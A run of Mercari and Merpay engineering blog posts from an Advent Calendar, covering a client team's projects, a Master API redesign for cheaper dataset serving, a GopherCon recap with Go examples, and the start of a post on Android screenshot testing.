The intention is to have that same mindset in our team.

The team’s responsibilities are

Client tech direction and governance within Merpay
Build optimized architecture for Mercari Group
Install best practices in Merpay product teams

We work on solving cross-functional technical issues to contribute to the growth of the product.

We are currently a small team with a mix of Japanese and English speakers, and we try to keep the language policy of the team neutral. For example, in weekly team meetings, we switch the main language between Japanese and English each week. Since Mercari Group has a diverse range of members, we believe that we need to be language-neutral in order to promote cross-functional projects.

Projects

Currently, our mid-term roadmap is Zero Legacy & Group Optimized Architecture, and we are currently working on several projects for it.

The first is an update of the authentication infrastructure. This is a project being promoted throughout Mercari Group, and we are working on updating the authentication mechanism used in our apps. Under the Mercari Mobile Architect Team’s lead, the Merpay Enabling Client Team is specifically working on updating interaction between our apps and the API that provides Merpay-related features and authentication methods for in-app WebView and iOS App Extensions.

The second is an update of the UI framework for the iOS/Android app.
Last year, the Mercari app was fully rewritten from scratch through the GroundUP App project. Now it is entirely based on an in-house design system built with declarative UI frameworks such as SwiftUI/Jetpack Compose.

Because the features in the Merpay area were designed to be portable, and we continued to develop some features in parallel while the project was underway, existing features in the new app after the GroundUP App project were still using a UIKit/Android View-based technology stack.

[JA] メルカリアプリのコードベースを置き換える GroundUP App プロジェクトの話

Merpay is currently working across the company to apply the design system to existing and newly developed features aiming to unify the technology stack and the user experience of the app across Mercari Group.
I am personally in charge of leading this project, managing the overall progress, scheduling, and reporting to the VP to accomplish the project, and we have already released several features with the new design system.
In addition to the benefits of development with declarative UI frameworks such as SwiftUI and Jetpack Compose, applying the new design system facilitates support for dark mode, which was not previously supported, and accessibility.
Although it has not yet been applied to some features, we aim to eventually have all features migrated by increasing the coverage rate in the future.

The third is an update of the web frameworks.
Merpay operates a variety of web services, including tools for customer support, tools for merchants, and various campaign pages.
Vue and Nuxt.js are used as the main frameworks for those web services. But Vue2 and Nuxt2 support is scheduled to end in December 2023 and June 2024, respectively. In order to continue product development while maintaining security measures and browser compatibility, it is necessary to upgrade to the next version by the end of life of these frameworks. Migration of existing services to Vue3 and Nuxt3 is underway.
After the migration, we would like to take on new challenges, such as standardizing the Vue technology stack within various services and incorporating other technologies such as React by utilizing Mercari Group’s technical assets.

In addition, we will work on several other cross-functional projects in the future, such as WebView optimization and transition to a new architecture. We hope to find opportunities to introduce the ways we are proceeding with those projects and the technical insights gained in the projects individually in the future.

Conclusion

The Merpay Enabling Client Team aims for Zero Legacy & Group Optimized Architecture while maintaining discipline in the Fintech domain and working with the Mercari Mobile & Web Architect Team.
We hope this will be helpful to those who are leading similar teams that support overall development by solving cross-functional technical issues and improving productivity.

Tomorrow’s article will be by @kenmaz from the same team on "Redesigning iOS app navigation with modality in mind".
Stay tuned !

The new Mercari Master API

Sun, 17 Dec 2023 11:00:16 GMT

This post is for Day 17 of the Mercari Advent Calendar 2023, brought to you by @CAFxX from the Mercari Backend Architecture Team.

A few months ago, Mercari realized that an older design was seriously harming our ability to deliver new features quickly and cost-effectively. This realization spurred a rethink of the highest-volume API exposed by our backends. To do so, we clarified exactly what the responsibilities and scope of the new API should be, with an eye on allowing the most efficient implementation possible that still satisfied our business requirements. The result is a much simpler API that is faster, lower-maintenance, and millions of dollars cheaper to run, and a testament to the need, when appropriate, to go back to the drawing board and question long-held assumptions, including about technical and business requirements.

The solution identified, while not too dissimilar at its heart from a standard static asset server, makes full (and somewhat unusual) use of standard HTTP mechanisms – such as content negotiation – paired with an asynchronous content ingestion pipeline to deliver master datasets as efficiently as possible to all clients, internal or external, that need them. The solution is highly reliable, scalable, extensible, and reusable both for additional datasets, as well as a generic blueprint for other classes of content.

Master Data

One of the oldest APIs of the Mercari marketplace is the Master API. This API is used by clients – both internal and external – to obtain the master data used as the shared context of our businesses. Without this master data, many of our systems – including clients – are unable to work correctly.

Historically, the master data in Mercari has always been somewhat limited in size, scope, and frequency of updates: most master datasets were in the kilobyte range (with a single notable exception: the list of brands that was over a megabyte in size), and they were very seldomly updated (roughly, a few times per year). This, coupled with the fact that external clients would check for updates to this data only once per session, naturally led to a design that emphasized simplicity (both implementation-wise and maintenance-wise) over efficiency.

The original design, in a nutshell, maintained the master data as static data in the Master service Git repository. A specialized internal tool allowed business users to make and approve changes to the master data, and these changes would be synced back to the data in the repository. When appropriate, the Master service (alongside the modified master data baked into the container image) would then be redeployed.

This approach had the benefit of having no external dependencies, so it was perfectly horizontally scalable and extremely reliable.

At the same time, this simplicity had a few downsides. Internally, the Master APIs – like most of our internal APIs – were implemented over gRPC. This posed a few problems: first of all, gRPC is not really designed for returning responses larger than a few megabytes; this is fine for dynamic responses as they normally implement some form of pagination, but for static responses, this is somewhat inefficient as it forces to implement pagination even if ultimately we always have to fetch the full dataset.

Related to this, all of our gRPC APIs that must be available externally are exposed as HTTP APIs by our gateways, which in addition to performing the gRPC-HTTP transcoding also perform response payload compression. This is normally fine for dynamic responses, but it is fairly inefficient for static ones, as the data returned is almost always identical, so transcoding and compressing it in every response is wasteful, especially since the Master API is the one that consumes the largest amount of egress bandwidth – largely due to the large size of the response payloads.

Over time, as business requirements evolved, the Master API also started supporting some form of dynamic capabilities, e.g. allowing to lookup by ID specific entries inside a dataset or, in some cases, even limited filtering/searching capabilities. This was done mostly for the convenience of other internal services and clients, but had the unfortunate consequence of forcing the Master service to understand the semantics of each of the datasets, pushing onto the team that runs the Master service concerns that should rightfully belong to the domain team that owns each dataset.

Furthermore, in the last year, additional business requirements led to a fundamental change in the architecture of the Master service, in that a minority of datasets were internally delegated to services in other domains. As a result, for these datasets, the Master service started acting as a proxy for the other services – thus adding critical dependencies to a service that initially was designed to have none. Furthermore, over time, internal clients have started to use the filtering/lookup functionalities of the Master service instead of performing the same operations on locally copies of the datasets, thus generating significant amounts of internal traffic, and adding Master (as well as the other services that Master proxies to) to their critical runtime dependencies.

Master v1 architecture as of 2023H1. Internal clients normally interact with the Master datasets using a library that abstracts away the complexity of the Master v1 architecture and transparently bypasses the Master v1 service for specific datasets

This situation reached a critical point in June 2023, when the brands dataset was suddenly tripled in size as part of new business requirements. The Master team first ran into the (soft) 4MB limit in gRPC response size enforced by our gateways: a temporary exception raising the limit was initially granted to accommodate the larger payloads of this dataset, but it quickly became clear that the API itself had a much more fundamental problem: the increase in payload alone would have cost hundreds of thousands of dollars in Internet egress costs per year. As this was just the first planned increase in dataset size, it quickly became clear that a rethinking of this API was necessary and urgent.

Rethinking the Master API

The initial approach to solving this problem was to reuse a part of the Master API that was partially implemented in the last few years, chiefly the ability for clients to specify they wanted to receive, for a specific dataset, only the records modified since a specified timestamp.

This functionality was initially supported by the Master API, but had not been implemented in clients, that were thus always fetching the full dataset. Consistently using this approach would have helped in some aspects, such as reducing the amount of data transferred on average, but it would have fallen short in others: chiefly, it would not have solved the following problems, among others:

the Master service would still need to be aware of the semantics of each dataset (so adding additional datasets would have required non-trivial work); this is important as it frees up engineering resources in critical teams
the APIs to fetch each dataset would have still differed between datasets; this is important as we maintain multiple clients, and each additional API requires work on each of them
the gateways still had to repeatedly compress the same data over and over; this is important as compression takes up ~⅓ of the CPU resources consumed by our Gateways, and the Master API is, by traffic volume, the top user of Gateway resources
for datasets delegated to other services, the services would have had to implement pagination and incremental fetching as well; this is important as doing this consistently across teams is not trivial and adds overhead
modifying the schema of a dataset would have still required work also on the Master service; this is important as it creates overhead and friction when we need to roll out changes
making the API work with CDN caching would have been quite difficult due to complexity of the existing per-dataset APIs; this is important as adding CDN caching would significantly cut the most expensive line item for this service, i.e. the GCP Internet egress
clients, due to the availability of the search/filtering functionality on some datasets, have started to treat the Master APIs as dynamic APIs instead of APIs for accessing static data; this is important as it leaks concerns from the domains that own each dataset into the Master service, and this adds unneeded complexity and overhead to a critical

To attempt to solve or alleviate these problems, a proposal was put forward to disentangle the two main functionalities offered by the Master service, i.e. separating the dissemination responsibilities from the master data interpretation ones, and letting the Master service focus exclusively on the former, while delegating the latter to shared components/libraries.

Under this proposal, the new Master v2 service would become a much simpler generic dataset server, singularly optimized for ensuring that any dataset can be made available to all clients that need it as quickly and efficiently as possible. The proposal also contained compelling quantitative estimates for the expected benefits and cost reductions that the design should be able to achieve.

The new design flips the relationship between the Master service and the sources of the delegated datasets: now these services, whenever a new version of a dataset needs to be published, push the Protobuf-encoded updated dataset to an ingester that validates¹ the dataset, transcodes it to JSON², normalizes it³, compresses it using multiple encodings (currently gzip and brotli) at maximum compression level, and assigns a unique ID to each version.

When this ingestion process is complete, all the resulting variants (protobuf, json, protobuf+gzip, protobuf+brotli, json+gzip, json+brotli) of the dataset are atomically stored in the newly-created Master database⁴. Each replica of the Master service monitors the database for changes, and when any are detected a local copy of all variants’ data is made in the ephemeral local storage of each replica⁵, while a copy of the variants’ metadata is kept in memory in each replica: this ensures that requests to the Master v2 service can always be served by each replica without relying on any dependency (including the master database itself).

Master v2 architecture: master datasets are pushed from internal services to the ingester, and the resulting ingested datasets are persisted in the Master database (between ingester and service); each Master v2 service replica loads the datasets from the Master database and stores a copy locally.

Master v2 ingestion pipeline: for each version of a dataset six variants are generated and stored in the Master database, from where they are copied to each Master v2 service replica for serving. Sanity check steps were omitted for clarity. The ingestion queue acts as a transactional outbox for the ingestion pipeline. Because all data and metadata are copied to each replica of the Master v2 service, the Master database is not a critical dependency for serving the datasets.

Since each version of the dataset is assigned a unique ID, this ID is also used as an Etag to enable conditional HTTP requests with If-None-Match to return a 304 Not Modified response immediately in case the client already has the latest version of that dataset.

This design allows all requests to be served extremely quickly and efficiently:

For a 304 response (that is the vast majority of responses) the service performs a single in-memory hashmap lookup to check the dataset ETag
For a 200 response, the service performs a single in-memory hashmap lookup, followed by sending the response with appropriate content type and encoding that is stored in a local file

As all variants of a dataset are already converted to the appropriate content type and encoding, no further compute-intensive processing is required by either the service or gateway, and the workload thus consists of just serving a static file per request – and that file is likely to be in the kernel page cache anyway⁶. As a result of this, almost all requests will complete in the order of microseconds, while consuming almost no CPU resources.

Furthermore, as all variants are available ahead-of-time and their metadata kept in-memory, during content negotiation we can trivially perform a neat trick: if the client accepts multiple content types and/or content encodings we can quickly select the smallest among all variants that the client can accept, and transparently serve it to further reduce egress bandwidth⁷.

This may initially seem unnecessary as one would expect e.g. brotli to always outperform gzip. The reality though is that, depending on the size and nature of the dataset, it is possible for some unintuitive situations to occur, such as a gzip or even uncompressed variant being smaller than a brotli compressed one⁸. By deterministically selecting the smallest variant among all the ones that the client can accept we can further gain a few percentage points reductions in traffic volume.

This mechanism is fully extensible, and could easily support e.g. additional content encodings and content types: we will get back to this later in the post when we talk about delta encoding, but it’s also worth pointing out that something like this could similarly be used to serve other large static assets (such as images) that can be served using multiple content types/encodings, or even other criteria altogether⁹.

An additional benefit of this design is that, as the datasets are versioned and rarely changing, and the payload depends exclusively on metadata in the request (the dataset name contained in the URL, and the Accept, Accept-Encoding, and If-None-Match headers) it is safe to enable CDN caching on the API serving the datasets¹⁰. Doing so, with an appropriately-tuned revalidation policy, has eliminated almost entirely the Internet traffic between our GCP backends and the CDN, as the CDN is able to directly serve almost all traffic, while still allowing new dataset versions to be pushed out to clients within approximately a minute. As a welcome side effect, this also allows the CDN to continue serving datasets to external clients even in the unlikely case in which the Master service is unavailable for short periods of time¹¹.

Once the Master v2 API was rolled out on our backends, our Android and iOS clients, and our web frontends, could migrate to it and implement the caching required to make use of the conditional HTTP requests mechanism. Once support for caching was rolled out in the clients, traffic between the clients and our CDN decreased by over 90% as in most requests the client reports having already the most recent version of the dataset, and thus the CDN can respond with a 304 response.

Thanks to all the benefits and improvements described above, the new Master v2 API managed to cut our infrastructure and traffic costs by over 1M USD/year, matching and surpassing the estimates given in the original proposal. All of this is just considering a subset of the datasets and clients, as only a few datasets, and only the external clients, have already been migrated to the v2 API: once all datasets and internal clients have been migrated, and given the expected increase in active users and dataset sizes, we estimate the savings will be even greater. All of this was achieved while fixing all the issues that we set out to address at the start of this section, and also delivering E2E API latency improvements.

Daily network infrastructure costs for our production environment (relative): the feature-flag-controlled rollout proceeded incrementally between September 20th and 28th is responsible for the sharp drop in daily costs. This chart does not consider compute and CDN costs. The expected reduction in global costs is over 1M USD/year.

		v1	v2 (with larger datasets)
E2E latency (iOS)	p50	248mss	68ms
	p95	1873ms	761ms
	p99	10886ms	4005ms
E2E latency (Android)	p50	0.69s	0.76s
	p90	2.58s	2.58s
	p99	12.27s	5.74s

End-to-end latencies, as measured by clients, of the Master v1 and Master v2 APIs for the brands dataset. The difference between Android and iOS is partially due to differences in how the latencies are measured. The large tail latencies are mostly due to client network conditions, but they normally do not significantly affect UX as in most cases dataset loading happens asynchronously in the background.

As a final note, it is important to underline how the description given above left out many design and implementation details, such as the client standardization and improvement efforts, or the CDN integration and tuning, that may be covered in future posts.

What’s next?

Master v2, while the migration is not complete yet, is already a significant success, but we know there are some scenarios in which this design may not live up to its efficiency goals.

One such scenario is that of a large dataset that is updated fairly frequently (e.g. multiple times a day). This is something that we currently do not have use cases for, but it is quite possible that in the future we will run into them. Luckily, the design we have chosen has one last trick up its sleeve: delta compression.

Since we know that most clients of our external APIs are under our control and therefore implement client-side caching, we can take advantage of this and use the data in the client cache (of which we know the version, as the client sends it in the If-None-Match header) and use it as the base upon which to apply a delta that transforms the client-cached version into the current one. This would allow our backends and clients to only transfer much smaller payloads, instead of having to download the full dataset every time part of it changes.

This is normally not done as it’s not practical: backends normally do not keep previous versions around to use to compute the delta. But our ingestion pipeline can do this trivially: we already version datasets in the master database, so during ingestion we can easily fetch older versions of the dataset and generate a delta (using vcdiff) from each to the version we are ingesting: each delta is generated against the normalized, uncompressed variants of the previous version, and the results are then compressed as in the case of the non-delta encoded variants¹².

Master v2 ingestion pipeline with delta encoding: vcdiff encoding is performed between each delta base (normalized uncompressed variants of N previous versions, N=2 in this diagram) and the normalized uncompressed variants of the new version. For each new version of the dataset, this generates up to (N+1)*6 variants.

While this may seem much more complicated, its implementation is actually trivial if (as in this case) we have readily available the normalized variants of the previous version we are using as the delta base. It’s true that for each old version that we want to use as a delta base we need to generate a new set of 6 variants, but storage is cheap so this is not a huge concern. Furthermore, the resulting delta-encoded variants are normally very small, as their size only depends on the amount of data added/modified between the delta base and the version we are ingesting. We can also apply a few other tricks to further reduce storage (and bandwidth):

First of all, as the Master v2 API does not need to support fetching older versions of a dataset, we don’t need to keep delta variants targeting versions older than the most recent one. This means that when we ingest e.g. version 6 of a dataset, we can immediately delete from storage all delta variants that target version 5 or older.
Because we produce all variants during ingestions, we can immediately prune useless variants. E.g. if the delta variant between v4 and v5 is larger than v5 alone, there is no point in ever considering it for serving (as during content negotiation we deterministically pick the smallest variant that the client supports, and if the client can accept the v4-v5 delta variant, it is also guaranteed that it will accept the full v5 variant). This is true also separately and in conjunction with compression (so e.g. if a gzip-encoded variant is larger than the uncompressed variant, there is no point in ever considering the gzip variant). This protects us from wasting storage on pathological edge cases.

From the perspective of the clients, implementing support for the delta variants is not excessively complicated¹³: when a client needs to check for an update to a dataset, it sends as usual the request containing the If-None-Match header set to the ETag of the locally-cached version of the dataset, if any. In addition, it adds vcdiff in the Accept-Encoding header: this signals to the Master v2 service that the client can accept delta variants.

Master v2 then performs the usual checks: if the ETag in the If-None-Match is the same as the most recent version of the dataset, it returns 304; if not it performs content negotiation as usual, but this time also considering the delta variants; if a delta variant is selected as it has the smallest payload, the service sends it and adds vcdiff to the Content-Encoding header¹⁴ in addition to the compression encoding used (gzip, brotli, or no compression); if not (e.g. because the If-None-Match refers to a version for which no delta variant is available) the full variant is sent, as usual.

When the client receives the response, it first decompresses it as usual, and then if the Content-Encoding header also includes vcdiff it performs vcdiff decoding using the locally cached uncompressed version as the delta base. In case delta decoding fails for whatever reason, including e.g. due to a mismatch between the delta base expected by the delta variant and the one provided by the client cache, clients repeat the request but without specifying vcdiff in the Accept-Encoding header: this forces the server to send a full variant, that will overwrite the locally-cached corrupted dataset version, thereby fixing the problem for future requests.

Comparison of variant payload sizes for a single dataset version: full variants are rows with no value in the Delta column, while delta variants have the ETag of the delta base in the Delta column; as it can be seen in the Size column delta variants can be orders of magnitude smaller than the full variants.

The benefits of delta encoding are, as mentioned above, that the amount of data transferred depends only on the amount of data modified between versions. Due to this, it is difficult to predict exactly how beneficial delta encoding is going to be, but rough estimates based on current datasets and usage patterns, indicate a further 70~80% likely reduction of egress traffic between the CDN and the clients. Given the already significant cost reductions that were achieved just by the initial Master v2 implementation, delta encoding will likely not make a very significant in absolute infrastructure costs, but will definitely help latency and client power and bandwidth consumption, all things that are fairly important to our users since most of them use Mercari on mobile devices.

There are also other avenues for further reducing bandwidth. One such example is adopting Zstandard in addition to Brotli and Gzip, since web browsers are starting to consider supporting it. While Brotli is normally already extremely efficient, preliminary testing suggests that, on our datasets, Zstandard can often compress JSON variants better than Brotli can – even though this is normally not the case with Protobuf, where Brotli is often better. Another possibility is to use Zopfli to perform Gzip compression instead of the standard gzip tools¹⁵ to achieve better compression ratios for gzip variants. Adding support for both would basically just involve adding one more compressor in the ingestion pipeline, and (for Zstandard) support for it during content negotiation. Doing these would likely further cut egress bandwidth, both between backends and CDN and between CDN and clients, by a few percentage points¹⁶.

And this is not all: on our roadmap there are plenty of additional features and ideas that were considered and helped shape the extensible design and architecture of the new Mercari Master API; these will be explored and implemented (and possibly documented in followup posts) when good use cases for them materialize.

¹ Validation leverages our Protobuf infrastructure to ensure strict syntactical conformance to the Protobuf schema of each dataset.

² While our Android, iOS, and internal clients consume the datasets as Protobuf, our web clients prefer JSON, so supplying the dataset in both formats was a hard requirement.

³ Normalization reduces the payload and makes it deterministic (e.g. by sorting fields and map keys in a standard order). This helps compression, makes it possible to compute stable hashes that only depend on the semantically-relevant content of the payload and, as we will see later, is especially important for delta encoding.

⁴ For simplicity and familiarity this is hosted in a small Cloud SQL instance. Performance is not a concern, since the only time when activity occurs on this database is when a new dataset version is posted, and the workload is trivial.

⁵ As with all other services in Mercari, the Master service is also deployed on GKE with auto scaling enabled, so the number of replicas varies depending on load. As will be discussed later, thanks to CDN caching, the load on this service is extremely low – but if needed (e.g. because of issues with CDN caching that force us to bypass the cache) it can quickly autoscale to handle the whole load.

⁶ We also use a few other tricks to make this as fast as possible: first of all we use a single long-lived file descriptor per file to avoid opening/closing the file for each request, and we read from the file descriptor concurrently. Second, we store very small variants – approximately smaller than the memory overhead required to keep a file descriptor open – directly in the memory of the Master API service. Both allow us to minimize the number of system calls required to process a single request, minimizing CPU resource utilization and response latency.

⁷ These advanced content-negotiation capabilities, especially considering the delta encoding functionalities discussed later in this post, is one of the main reasons why we avoided using GCS/S3+CDN to serve the datasets, as it would have been borderline impossible to achieve the same results with lower complexity than a simple API under our full control, fronted by a CDN.

⁸ This frequently happens for payloads smaller than a few hundred bytes.

⁹ Quality/bitrate, resolution, aspect ratio, client capabilities, bandwidth, or preferences, etc.

¹⁰ Having worked around a number of bugs/quirks of the CDNs we use.

¹¹ Up to a few hours.

¹² vcdiff is normally used with LZMA compression, but this is optional and can be disabled. We do this as we do not want to force clients to also implement LZMA decompression. And since HTTP and Master v2 already have mechanisms for compression, we use vcdiff just for the delta encoding/decoding, and delegate compression to standard HTTP mechanisms.

¹³ In theory the Delta encoding in HTTP RFC specifies also how to use VCDIFF in HTTP. Unfortunately support for that scheme is not widespread among HTTP implementations, so what we are describing here is a custom, simplified solution loosely based on that RFC. Some details required for compatibility with specific CDNs have been omitted for brevity.

¹⁴ The Content-Encoding header can contain multiple encodings, so e.g. “vcdiff, gzip” is a valid value that means that the the response payload has to first be decompressed using gzip, and then decoded using vcdiff.

¹⁵ This would normally be an absolute no-go for web resources, as Zopfli is famously slow during compression, taking hundreds of times longer than gzip to compress the same data. But because all of this runs exactly once during ingestion, we do not need to worry about whether compressing a dataset takes a few seconds.

¹⁶ Both of these examples have already been implemented as PoCs, but we do not yet have reliable large scale numbers about their effectiveness.

Header image generated using DALL-E 3.

2023 GopherCon Review

Sun, 17 Dec 2023 10:00:36 GMT

This post is for Day 17 of Merpay Advent Calendar 2023, brought to you by tenling from the Mepay Growth Platform team.

GopherCon is a conference dedicated to the Go programming language, also known as Golang. It’s named after the Go language’s mascot, which is a gopher. The conference typically brings together members of the Go community, including developers, contributors, and enthusiasts, to discuss the language, share knowledge, network, and learn about new tools, libraries, and best practices. This year’s gopherCon was held in a number of countries, and I attended the 9/25-9/28 GopherCon in San Diego.
Let’s take a look back at some of the agenda and activities during that time!

TinyGo

There is a workshop to provide TinyGo boards and example code that you can modify and add your own personal information, like making electronic badge, fill in your name, the company you work for, and your picture (the attached picture is a slack image that I used in the company), I didn’t know we could use golang to compile the program on the Arduino board, it was an eye opener for me!
this is the example code that I got in the workshop: https://github.com/hybridgroup/gophercon-2023
In addition to the GoBadge, there are also circuit boards, soldering tools, and sensors available on site, so we can experience driving various hardware devices with Golang on the spot, which is very interesting.

CTF

CTF activities were also organized during the seminar. The topics were very diverse, ranging from simple cookie issues to difficult anti-translation issues and web vulnerabilities. Some of the topics were related to the session of previous years’ GopherCon, so I watched some of the videos of previous agendas and learned a lot.

"Clean Up Your GOOOP: How to Break OOP Muscle Memory"

There was an impressive session that discussed Golang in relation to object-oriented programming. This is a very exciting session that has provided me with a lot of insights for my development work and a new perspective on OOP, making me understand Go even better.Many people’s first language is an OOP language, when they learn a new language they inevitably get into the habit (or you can say muscle memory) of programming like in the previous language or the first language they learned, and Go as a young programming language is almost never the first language for people, it makes Goop=Go+OOP situation happened that the speaker talked about. The Speaker pointed out some pain points of Gooop, such as:

“Creating separate, Shared components to resolve co-dependency”, which means packages might only contain interfaces and structures without behavior. For example:

// Package shared defines the interfaces and structures used across different services.
package shared

type User struct {
    ID   string
    Name string
}

type UserService interface {
    GetUser(id string) (User, error)
    CreateUser(user User) error
}

This shared package contains definitions of what a User is and what operations can be performed with a User, without dictating how these operations are carried out. To prevent shared components from becoming bloated or developing circular dependencies, ensure that they contain only what’s common and necessary for the interfaces and types they define. Strive for minimalism, providing only the essential shared logic or types needed across different parts of your application.

“Declaring interface as exported provider abstractions”, which means implementation has an Impl suffix, and re-declares every method on the implementation struct. For example:

// Package userimpl provides a concrete implementation of the UserService interface.
package userimpl

import (
    "example/shared"
)

// UserServiceImpl is a concrete implementation of the shared.UserService interface.
type UserServiceImpl struct {
    // Dependencies, like a database connector, go here.
}

func NewUserServiceImpl() *UserServiceImpl {
    return &UserServiceImpl{}
}

func (s *UserServiceImpl) GetUser(id string) (shared.User, error) {
    // Actual implementation goes here...
}

func (s *UserServiceImpl) CreateUser(user shared.User) error {
    // Actual implementation goes here...
}

The userimpl package contains a concrete implementation of the UserService interface from the shared package, adopting the Impl naming convention for the struct that provides this implementation. While the Impl suffix is a common practice, some Go developers prefer to name structs with more descriptive names related to their behavior or underlying technology, like PostgresUserRepository. Doing so can provide more clarity than a generic Impl suffix, especially in larger codebases with multiple implementations of the same interface.

“Architectural Patterns”, which means packages named as pattern layers, and type being repeated in each package, and modify entity/model will need to update multiple packages.

// Package repository for data access layer.
package repository

import (
    "example/shared"
)

// UserRepository defines methods to access user data.
type UserRepository interface {
    FindByID(id string) (*shared.User, error)
    Store(user shared.User) error
}

// Package service for business logic.
package service

import (
    "example/shared"
)

// UserService is the interface that defines business operations available for a User.
type UserService interface {
    GetUser(id string) (shared.User, error)
    CreateUser(user shared.User) error
}

// Package api for the API layer.
package api

import (
    "example/shared"
    "example/service"
)

// UserController handles the HTTP requests related to Users.
type UserController struct {
    userService service.UserService  // Reference to our business logic layer.
}

func (uc *UserController) GetUser(id string) (shared.User, error) {
    // Delegates to the business logic layer.
    return uc.userService.GetUser(id)
}

In this example, each package (repository, service, API) represents a different layer in the architecture. The User type from the shared package is used across these layers, promoting consistency while allowing each layer to focus on its responsibilities. If changes are made to the User model in the shared package, we only need to ensure the interfaces remain satisfied; no redundant code update is needed across multiple layers if the changes don’t affect the service contracts.

As I am writing this blog post, I still feel inspired and hope that GopherCon will release the video recordings of this year’s agenda, so that more people can benefit from hearing this session.

“Balanced GC: A Copying Garbage Collector for Golang”

This session was talking about GC service in ByteDance. GC is Garbage Collect which is a form of automatic memory management that attempts to reclaim garbage, or memory occupied by objects that are no longer in use by the program.

There basically has three types of GC, Serial GC allow only one collector, ParallelGC allow multiple collectors, ConcurrentGC allow mutators and collectors run in the same time, Go simplifies memory management with its advanced garbage collector that employs a concurrent, tri-color mark-sweep algorithm. Integral to the language’s runtime environment, this garbage collector effectively manages memory release, balancing efficiency and performance for high-speed operation.

Go’s garbage collection leverages a sophisticated method that allows for efficient memory cleanup with minimal impact on application performance. This is achieved through a concurrent, tri-color, mark-sweep scheme. Let’s delve into what each component entails.

Concurrent
In the context of Go’s garbage collection, the term "concurrent" indicates that memory cleaning activities are carried out in parallel with the application’s operations. Unlike some traditional garbage collection methods that necessitate a total pause ("stop-the-world"), Go’s GC minimizes interruption. This concurrent operation reduces lengthy pauses and is especially beneficial for systems requiring high availability or real-time responses.

Tri-color
The "tri-color" aspect of Go’s GC refers to a particular stratagem used during memory marking. It divides objects into three categories based on their processing status:
White objects have yet to be evaluated by the garbage collector and their accessibility remains uncertain.
Gray objects have been identified as accessible from the roots but their own references haven’t been fully explored.
Black objects are those that have been fully examined; they and their reachable descendants have been accounted for.
Initially, all objects are labeled as white. The GC begins with root objects, turning them gray and examining them for references to other objects, which then also become gray. Once an object and all its references have been inspected, it turns black. The tri-color approach effectively segregates objects during the mark phase, simplifying the identification of those that are no longer reachable.

Mark-Sweep
The "mark-sweep" descriptor outlines Go’s two-stage process in garbage collection:
The Mark stage involves the GC combing through the memory graph from root objects, marking accessible objects using the tri-color approach detailed above. This stage is performed concurrently, interwoven with the running program, to minimize pauses.
During the Sweep stage, following the marking process, the GC proceeds to reclaim the memory used by white objects deemed unreachable. Consistent with Go’s preference for concurrency, this step is also performed simultaneously with program execution, incrementally freeing up memory that’s no longer in use.
Go’s mark-sweep method is designed to strike a balance, optimizing both program runtime efficiency and memory utilization, which is essential for a wide range of applications reliant on the Go language.

Solution for Balanced GC
Each goroutine is equipped with its dedicated allocation buffer, known as the Goroutine Allocation Buffer (GAB), which encompasses a sizable memory block of 1 KB. This buffer plays a significant role in the efficient and specialized allocation process for certain kinds of memory objects.

Designed to cater to the allocation needs of ‘noscan’ objects—small memory segments that the garbage collector does not need to scan—the GAB efficiently handles objects that are smaller than 128 bytes. Such objects typically do not contain pointers to other objects, which simplifies the memory management process and requires less intervention from the garbage collector.

Managing the GAB involves the coordination of three distinct pointers: base, end, and top. The ‘base’ pointer marks the beginning of the buffer, while the ‘end’ pointer signifies the conclusion of this memory block. The ‘top’ pointer is the dynamic marker that tracks the current position up to where the memory has been allocated.

Memory allocation within the GAB is performed using a technique known as ‘bump pointer allocation.’ This approach is characterized by its simplicity and speed, where the ‘top’ pointer moves, or ‘bumps,’ forward in memory each time a new object is allocated. As long as the ‘top’ pointer has not reached the ‘end’ pointer, indicating that the buffer is full, this allocation method can continue swiftly allocating new objects by merely adjusting the position of the top pointer.

This bump pointer style is particularly efficient because it eliminates the need for complex algorithms to find suitable spots for new objects. Instead, it takes advantage of the contiguous free space provided by the GAB. It also simplifies deallocation, as freeing memory does not require any individual object tracking—once the relevant goroutine is no longer in use, the entirety of its GAB can be reclaimed.

In summary, the GAB is a fine-tuned mechanism that contributes to the language’s performance by optimizing memory allocation for small, straightforward objects, relying on a quick and effective bump pointer system for memory management. Using Balanced GC reduced peak CPU usage by 4.6% and decreased the latency of core interfaces by 4.5% to 7.7%.

Attending GopherCon for the first time was an enlightening experience that expanded my perspective as a developer. I gained numerous insights and hope that you, too, can benefit from my recap of the event.

Other participants shared their experiences and session summaries from GopherCon in mercari.go #24. The Mercari group regularly organizes meetups related to Go, and if you’re interested, please follow us on Connpass and Meetup to learn more.
meetup: https://www.meetup.com/mercaridev/
connpass: https://mercari.connpass.com/

Tomorrow’s article will be by Masamichi San. Look forward to it!

Closing the visual testing gap on Android with screenshot tests

Sat, 16 Dec 2023 11:00:20 GMT

This post is for Day 16 of Mercari Advent Calendar 2023, brought to you by Lukas Appelhans, an Android engineer in the Client Architecture team.

Have you ever been slightly uncomfortable with shipping UI code because you couldn’t write automated tests for it? Or you spent a lot of time manually testing all combinations of parameters that a piece of UI could be rendered with?
When I became an Android developer a few years ago, I was surprised how normal it was to ship UI code to millions of users without any tests. For that reason, I became interested in visual regression testing – sometimes also called screenshot testing.

Last year, we wanted to close this testing gap for our Android developers at Mercari, and I finally got the opportunity to work on the necessary infrastructure to make that happen. This blog post will walk through some of the decisions we made when evaluating frameworks, the steps we took to implement the CI/CD pipeline and how we use screenshot testing.

A few months ago I presented about this topic at Droidkaigi – the talk is a lot more detailed than this article can be, so please take a look here if you want to understand more of the details or just prefer to watch a video instead of reading.

Why?

The short answer to the question of why we need visual regression tests is to ship UI code more confidently. This answer can be broken down into two significant contributors.

When all UI changes have to be tested manually, we often need to leave testing gaps due to the time needed to execute the tests. This is obviously the case when we do small changes to the UI and cut corners because we believe that regressions are unlikely. However, even larger UI changes rarely get tested on different form factors, screen densities or even with a large range of valid input values. Automating tests does not just reduce the total execution time and free resources that were needed for manual testing — it also enables us to add more test cases or run existing test cases on multiple device configurations.

Aside from increasing the quantity of test cases, screenshot tests also make them qualitatively better. One of the fundamental problems of manual visual testing is that it is hard to spot visual differences — even when comparing two screenshots side-by-side. Visual regression testing frameworks provide tools to review visual changes when they occur, effectively reducing the burden to spot visual differences with bare eyes.

So in summary, they’ll not just allow you to run more test cases against your code changes, but also make visual testing faster and more accurate.

How screenshot tests work

Compared to the classic test types such as unit tests, integration tests or E2E tests, screenshot tests have one particular difference: It’s not possible to write an automatic verification whether the rendering of a piece of UI code looks “good”. In other words: Given the classic given/when/then structure of a test case, the “then” condition cannot be automatically verified in screenshot tests.

